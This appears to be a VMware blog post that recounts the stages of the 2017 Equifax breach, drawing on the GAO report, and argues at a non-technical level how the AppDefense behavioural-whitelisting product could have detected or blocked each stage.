On Sep 7th 2017, Equifax – one of the “big-three” U.S credit bureaus – announced one of the most high profile data breaches in recent memory. This attack is estimated to have affected 143 million Americans through the loss of confidentiality of victims’ Social Security numbers, birth dates, and driver’s license numbers.
Since this breach, additional compromises of Equifax data have been reported – 200,000 stolen credit cards, PII stolen on 693,665 UK residents, spyware in Equifax credit assistance site, exploiting Equifax’s TLAX payroll division and more.
With the release of the August 2018 report by U.S Government Accountability Office titled “Data Protection: Actions Taken by Equifax and Federal Agencies in Response to the 2017 Breach” new details on the breach sequence and steps that could had been taken are revealed.
In this short write up, we’ll walk through the stages of the 2017 Equifax breach and explore how IT teams might proactively observe (detect) and engage (mitigate/block) on similar attack vectors using VMware AppDefense.
Shrinking the attack surface with VMware AppDefense
VMware AppDefense is an Application Behavioral Whitelisting solution focused on helping customers build a compute least privilege security model for data center endpoints and provide automated threat detection, response, and remediation to security events. AppDefense is focused on “ensuring good” versus “chasing bad” on data center endpoints. When we focus our attention on what a workload is supposed to be doing, our lens for seeing malicious activity is much more focused and as a result, we narrow the exploitable attack surface of the workload down to what we know about.
Anatomy of a Breach
The following diagram presents the main steps that took place in Equifax’s breach
On March 10, 2017, a new Apache Struts 2 vulnerability was published (CVE-2017-5638). The exploitation of this vulnerability resulting with the ability of executing arbitrary commands on the vulnerable system.
From Equifax’s logs, it seems that on that day, unidentified individuals scanned Equifax’s public servers and determine that some servers (e.g. online dispute portal servers) are vulnerable to the above vulnerability. It is not known if the unidentified individuals executed commands, but it reported that no data was taken at that time.
According to Equifax, couple of months later, on May 13, 2017, another incident occurred resulting in unauthorized access to the online dispute portal.
From Equifax’s logs, it seems that once the attackers got execution privileges on the online dispute portal servers, the attackers began to harvest the servers for credentials and issued queries to other database servers to search for sensitive information. With these actions, the attackers were able to increase their foothold from 3 servers of the dispute portal, to 51 databases on unrelated to the online dispute portal.
Over about 76 days the attack took place, the attackers executed approximately 9,000 databases queries to retrieve PII information, executed multiple commands (e.g. credentials scraping, log cleansing, reconnaissance activities and more) and used standard encrypted web protocols to disguise the exfiltration as normal network traffic.
A Different Approach
When analyzing the tasks performed by the attackers during the breach, many symptoms correspond with the least privileged security model. This is the approach VMware AppDefense leverages. Let’s examine how VMware AppDefense may have been able to help detect and/or block those symptoms.
New Binary Detection
In order to perform actions like credential scrapping, network communication with remote database servers, exfiltration, the attackers would have needed to perform different weaponizing actions to get required tools onto the Equifax servers. The execution of those new unknown binaries would have been deviations from the known good behavior AppDefense keeps and thus the deviations would have generated high fidelity alarms. Moreover, AppDefense could have blocked the execution of such deviations which would have closed this attack vector.
New Execution Pattern Detection
In the report, it is not noted if the tools used by the attackers during the attack were downloaded to the servers or the attackers leveraged existing OS capabilities to create dedicated tools on demand (e.g. “fileless”,” living off the land” attacks and similar to those documented under ATT&CK T1127). The previous section discussed the situation of downloading tools to the attacked servers. In the case of fileless attacks, AppDefense addresses this attack vector by monitoring not only the executed binary, but the full execution command with its parameters. Using Machine Learning and statistical analysis of the execution parameters that invoked the process, AppDefense can recognizes an unknown execution pattern and stop such command from being executed.
New Network Behavior Detection
The report states the attackers performed at least three types of network activities. The first was using different lateral reconnaissance to find new targets (in the attack, 51 database servers from different services were breached). The second network activity was querying other servers to retrieve the PII data, and the last network activity type was the exfiltration of the gathered data out of Equifax’s network.
Like with process execution, AppDefense learns and keeps the “known good” network behavior for each allowed execution. This behavior holds data such as source, destination and protocol information. This means that each type of communication explained above, will trigger a new network behavior on the server which AppDefense will monitor and stop. Thus, activities like lateral reconnaissance, lateral movement, data gathering, and exfiltration are much more difficult for attackers to perform, will trigger alarms, and can be stopped.
Unlike other PII data breaches where changing passwords or issuing a new credit card could resolve most of the risk, the effect of the Equifax breach will haunt us for many years. Despite having multi-layers of security controls in place, new and more sophisticated attacks are being developed every day and companies cannot keep up by “chasing bad”. VMware AppDefense addresses these very issues, with a new approach that leverages VMware’s unique position in the virtualization layer, to understand what applications were provisioned or intended to do, and then monitors against that state. With the ability to define Who (Binary) can be executed, How (Execution Pattern) the execution will look like and define What (Network Behavior) communications this running process can perform, VMware AppDefense managed to reach its fundamental approach for security (in this example) of reducing attack surface by “ensuring good”.